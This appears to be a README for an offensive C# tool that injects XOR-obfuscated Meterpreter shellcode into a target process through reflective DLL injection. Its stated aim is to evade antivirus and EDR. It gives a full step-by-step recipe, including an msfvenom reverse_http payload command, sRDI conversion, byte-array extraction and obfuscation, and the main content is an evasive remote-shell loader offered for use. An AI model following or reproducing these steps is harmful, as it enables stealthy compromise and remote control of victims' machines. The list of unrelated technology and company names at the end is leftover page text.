This tool written in C# with the purpose to perform Reflective DLL Injection with obfuscated (XOR) shellcode and bypass some Anti-Virus signatures and EDRs.
The tool consists the following projects:
- Xoring - Takes a key and then xoring the shellcode.
- XORedReflectiveDLL - Process Injection Loader for the obfuscated shellcode.
1) Generate DLL using msfvenom. (Feel free to use any tool you want to generate DLL. e.g: cobalt strike or write your custom DLL)
msfvenom -p windows/meterpreter/reverse_http exitfunc=thread LHOST=<> LPORT=<> -b "\x00" -f dll > reverse_http.dll
2) Use [sRDI](https://github.com/monoxgas/sRDI) to convert DLL to position independent shellcode.
python3.6 ConvertToShellcode.py reverse_http.dll
3) Execute the below command to convert .bin file to a compatible C# byte array format:
hexdump -v -e '1/1 "0x%02x,"' reverse_http.bin | sed 's/.$//' > reverse_http_bytearray.txt
4) Copy the byte array shellcode from the reverse_http_bytearray.txt and paste it in the Xoring.cs file at line 29. Make sure to paste it inside the curly brackets.
5) Change the XOR key at line 26.
6) Build solution and run the Xoring.exe to obfuscate the shellcode.
7) Open the file created (It should be similar to: xored_shellcode_*current date*.txt), copy the byte array and paste it in the Reflective.cs file at line 150.
8) Change the XOR key. (Make sure that the key is the same with the one that you used in Xoring.cs file before.)
9) Change target process. e.g: notepad, iexplore, etc..etc..
10) Build the program and run XORedReflectiveDLL.exe
Credits goes to monoxgas for the sDRI tool that convert DLLs to position independent shellcode.
Stephen Fewer for the Reflective DLL injection technique.
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent